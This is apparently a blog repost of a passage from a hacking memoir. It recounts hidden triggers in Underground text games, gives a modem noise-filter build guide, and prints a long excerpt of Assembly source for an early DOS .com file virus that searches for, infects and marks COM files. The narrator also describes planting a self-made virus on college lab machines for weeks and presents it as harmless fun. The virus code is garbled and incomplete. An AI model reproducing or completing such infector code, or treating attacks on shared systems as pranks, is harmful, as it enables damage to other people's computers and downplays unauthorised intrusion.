But what intrigued me most in that first delivery of Underground software were the "cookbooks," exploits, and vulnerability secrets included on the disk. You see, these files weren't visible on casual inspection; they were all hidden. And when I say hidden, I don't mean hidden by changing attributes, but hidden as in buried deep within other program files.
Hacker's To the best of my knowledge, this is the first time the information contained here has been revealed in published material, and has been done so with permission from the Underground.
These hidden programs were mostly games, text games that wouldn't appeal to the typical gamer. Later I became aware of the "tiks," or triggers throughout these text adventures. For example, ''You find yourself in the northern corridor; there is a cold breeze from the east. An old rusted container lies on the floor. The walls are sweating with moisture. Visible directions: North, East" In this situation, multiple tiks were required to reveal hacking secrets. Earlier in the game I had found an old cloth parchment, with some scribble, which would later be translated into a map of directions. In the northern corridor, however, by typing:
wipe wall with cloth [RETURN]
get can [RETURN]
squeeze cloth in can [RETURN]
precisely like that, the result was:
Passme?
The password here was simple. I entered a total of three tiks to get to this point. The first part of the password contained the third letter of each word on the first line. The second part contained the second letter of each word on the second line, and the third part the first letter of each word on the third line. Therefore, in this case, the pass code was, "pltoeascic." But there was more.
But before getting into that, I want to show you another example. If only two tiks had been required, such as:
wipe wall with cloth [RETURN] squeeze cloth in can [RETURN]
then the first part of the password would have included the second letter of each word on the first line, and the second part would have included the first letter of each word on the second line, in which case, I would have entered "iailscic." This format held true throughout most of the tiks for many years; and for all I know it still does—though I doubt since the advent of more advanced cryptography and other encryption methods.
Back to the "more'' I mentioned. I was referring to the missing link in the tik pass codes. The trick was to replace each letter "L" with a number "1," and each letter "O" with the number "0" in the passwords—not in the tiks themselves. Therefore, in the original tik entry:
wipe wall with cloth [RETURN]
get can [RETURN]
squeeze cloth in can [RETURN]
the correct pass code had to be entered as "p1t0eascic."
My initial reaction when I first encountered these hidden secrets was a combination of anticipation and excitement. The next screen contained textual hacker anthologies, some dating way back. The folowing is an excerpt on custom modem optimization:
With this circuit diagram and some basic tools (including a soldering iron, and four or five components from Radio Shack), you should be able to cut the noise/garbage that appears on your computer's screen.
I started this project out of frustration from using a U.S Robotics 2400-baud modem, and getting a fair amount of junk when connecting at that speed. Knowing that capacitors make good noise filters, I threw this together.
This is very easy to build; however, conditions may be different due to modem type, amount of line noise, old or new switching equipment (Bell's equipment), and on and on. So it may not work as well for you in every case. Please read this entire message and see if you understand it before you begin.
What you'll need from Radio Shack:
• #279-374 modular line cord if you don't already have one. You won't need one if your phone has a modular plug in its base.
• #279-420 modular surface mount jack (4 or 6 conductor).
• #271-1720 potentiometer. This is a 5 K audiotape variable resistor.
• #272-1055 capacitor. Any nonpolarized 1.0 to 1.5 uf cap should do. Paper, mylar, or metal film caps should be used, although #272-996 may work as well. (272-996 is a nonpolarized electrolytic cap).
• 100 OHM resistor, quarter or half watt.
• #279-357 Y-type or duplex modular connector. Don't buy this until you've read the section on connecting the Noise Killer below. (A, B, or C).
First, open the modular block. You normally just pry them open with a screwdriver. Inside you'll find up to 6 wires. Very carefully cut out all but the green and red wires. The ones you'll be removing should be black, yellow, white, and blue. These wires won't be needed, and may be in the way. So cut them as close to where they enter the plug as possible. The other end of these wires has a spade lug connector that is screwed into the plastic. Unscrew and remove that end of the wires as well. Now you should have two wires left, green and red. Solder one end of the capacitor to the green wire. Solder the other end of the capacitor to the center lug of the potentiometer (there are three lugs on this critter). Solder one end of the resistor to the red wire. You may want to shorten the leads of the resistor first. Solder the other end of the resistor to either one of the remaining outside lugs of the potentiometer—doesn't matter which. Now, to wrap it up, make a hole in the lid of the mod block to stick the shaft of the potentiometer through. Don't make this hole dead center, as the other parts may not fit into the body of the mod block if you do. See how things will fit in order to find where the hole will go.
Now that you've got it built, you need to test it. First twist the shaft on the potentiometer until it stops. You won't know which way to turn it until later. It doesn't matter which way now. You also need to determine where to plug in the Noise Killer on the telephone line. It can be done in one of several ways:
A. If your modem has two modular plugs in back, connect the Noise Killer into one of them using a line cord. (A line cord is a straight cord that connects a phone to the wall outlet—usually silver in color).
B. If your phone is modular, you can unplug the cord from the back of it after you're online, and plug the cord into the Noise Killer.
C. You may have to buy a Y-type modular adaptor. Plug the adaptor into a wall outlet; plug the modem into one side and the Noise Killer into the other. Call a BBS that has known noise problems. After you've connected and garbage begins to appear, plug the Noise Killer into the phone line as described above. If you have turned the shaft on the potentiometer the wrong way, you'll find out now. You may get a lot of garbage or even be disconnected. If this happens, turn the shaft the other way until it stops, and try again. If you don't notice much difference when you plug the Noise Killer in, that may be a good sign. Type in a few commands and look for garbage characters on the screen. If there still are, turn the shaft slowly until most of them are gone. If nothing seems to happen at all, turn the shaft slowly from one side to the other. You should get plenty of garbage or be disconnected at some point. If you don't/aren't, reread this message to make sure you've connected it right.
On the bottom of the page was a code sequence to abort and return to the game. Upon aborting, the command output field contained only the events that led up to entering the tiks. In this case, I found myself back in the northern corridor. Moving along in the game, after another series of events with specific tiks, additional screens included source code for some of the earliest viruses, such as this 20-year-old Assembly excerpt of one of the very first .com file infectors:
[bp + old_dta_off], bx
; save old dta offs
set_dta: rd
ah, 4eh
cx, [bp + search_attrib] dx, [bp + search_mask]
21h
clear_attrib
ah, 4fh
21h
clear_attrib ; find first file
; if successful dt
; created
; if found, continu
still_searching:
mov ah, 3bh
lea int jnc
; cd ..
Jmp
bomb
; at root, no more fi
les
clear_attrib: mov xor
es
lea int
ax, 4301h
cx, cx
dx, [bp + dta_file_name]
21h ; get rid of attribut
open_file: mov lea int
ax, 3D02h
dx, [bp + dta_file_name]
21h ; AL=2 read/write
Xchg
bx, ax
; save file handle
; bx won't change from n
ow on
check_if_command_com:
cld
lea di, [bp + com_com]
lea si, [bp + dta_file_name]
mov cx, 11
repe cmpsb
jne check_if_infected
jmp close_file
; length of 'COMMAND.
; repeat while equal
dx, word ptr [bp + dta_file_size] ; only use first dx, 2
; cx:dx ptr to offset ; origin of move
ers
mov ah, 3fh
mov cx, 2
lea dx, [bp + last_chars]
int 21h
; read last 2 charact
mov ah, [bp + last_chars]
cmp ah, [bp + virus_id]
jne save_3_bytes
mov ah, [bp + last_chars + 1]
cmp ah, [bp + virus_id + 1]
jne save_3_bytes
jmp close_file
save_3_bytes:
mov ax, 4200h ; 00=start of file
xor cx, cx
xor dx, dx
int 21h
mov ah, 3Fh
mov cx, 3
lea dx, [bp + _3_bytes]
int 21h
goto_eof:
move
mov xor
xor int
ax, 4202h
cx, cx dx, dx
21h
02=End of file
offset from origin of
(i.e. nowhere)
ax holds file size
; since it is a COM file, overflow will not occur
save_jmp_displacement:
sub ax, 3
3 = jmp disp.
mov [bp + jmp_disp], ax
; file size
write_code:
equate
write_jmp:
; to file
mov
ah,
40h
mov
cx,
3
lea
dx,
[bp +
int
21h
inc [bp + infections]
restore_date_time:
mov
ax,
5701h
mov
cx,
[bp +
dta_
file
time]
mov
dx,
[bp +
dta_
file
date]
int
21h
close_file:
mov ah, 3eh
int 21h
restore_attrib:
xor ch, ch
mov cl, [bp + dta_file_attrib] ; restore original attri
butes
mov ax, 4301h
lea dx, [bp + dta_file_name]
int 21h
done_infecting?:
mov ah, [bp + infections]
cmp ah, [bp + max_infections]
jz bomb jmp find_next
bomb:
cmp bp, 0
je restore_path ; original run
Stuff deleted
restore_path: mov lea int
ah, 3bh
dx, [bp + root] 21h ; when path stored ; '\' not included
th
mov ah, 3bh
lea dx, [bp + org_path]
int 21h ; cd to original pa
restore_dta:
mov mov int
ah, 1ah
dx, [bp + old_dta_off]
21h
restore_3_bytes: lea mov
cld
mov rep si, [bp + _3_bytes]
di, 100h
cx, 3
movsb ; in memory
; auto-inc si, di
return control or exit?
Prog
cmp
je
mov
jmp
bp, 0
exit
di, 100h di
; bp = 0 if original run ; return control back to ; -> cs:100h
exit:
mov int
ax, 4c00h
21h
old_dta_off dress
dw
0
; offset of old dta ad
;----------------- dta record
dta_filler db dta_file_attrib db
dta_file_time dta_file_date dta_file_size dta_file_name
search_mask OM
search_attrib com_com
21 dup (0)
0
0
0
0
13 dup (0)
'*.COM',0
00100111b
'COMMAND.COM'
; files to infect: *.C
; all files a,s,h,r
previous_dir db
root db
org_path db
infections db
max_infections db
'..',0 '\',0
64 dup (0)
0 1
; original path ; counter
_3_bytes jmp_code jmp_disp
last_chars
virus_id
db db
dw
db db
0, 0, 0
0E9h
0
0, 0
'AZ'
; do last chars = ID ?
eov:
virus_length equ
end start
offset eov - offset start
Eventually, I accumulated 2.4 GB worth of hacker secrets, and had amassed the source for more than 2,000 well-known (as well as some lesser known) nasty infectors of every derivative (approximately 2 MB of the 2.4 GB). Looking back, I believe the rush of being part of a "secret society," coupled with a youthful ego, caused me to forgo my principles for a while, and I began to play hacker while in college. The computer center was where students did research, typed their papers, and hung out between classes.Typically, there was a waiting list for the workstations. I would habitually take note of the expressions on my fellow students' faces as they glared at the computer screens—primarily, they looked bored. And that's what inspired my first attack.
As an elective for a computer science degree, I had chosen an advanced programming class, which met three days a week, two of which were held at the computer center. My plan was simple—and harmless—and motivated by generating some excitement. Because programming was my forte, it didn't take me long to complete the programs required to finish the class requirements, and I had plenty of time to help others and to plant my custom-made virus.
Upon entering the center, each student had to produce an ID card, and sign in for a particular workstation. Therefore, I couldn't infect my system or those next to me, so I transferred the hack attack from floppy to stations where students had trouble getting through the exercises. The attacks were simple: Upon x system reboots (all counted in hidden files), the system would execute my virus, typically masquerading as a system file. The effects generally consisted of loud sounds, fake screen "melts," and graphical displays. And I always left my signature: Mr. Virus.
It wasn't long before the college paper began to publicize the attacks. And though the students had started looking forward to the next random attack, the administrators were frustrated, and did not have an inkling of how someone could continually circumvent the heavily monitored and supposedly secured center. I continued the attacks for eight weeks, each more imaginative than the last, and they became the topic of countless discussions.
The technical staff at the center failed to find the hidden traps and instead had to rebuild each station. Eventually, I was turned in by another student who had overheard me talking to a member of the group I hung out with. Upon my "capture,'' the administration informed me that ordinarily my exploits would have resulted in my expulsion; but because the students and staff had so enjoyed the attacks, and because my professors came to my defense, I was allowed to complete my courses. Needless to say, I heeded the warning.
I didn't know then that the really whacked-out introduction to the "other" side of the Underground was yet to come.
... to be continued in: Hack Attacks Denied.
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment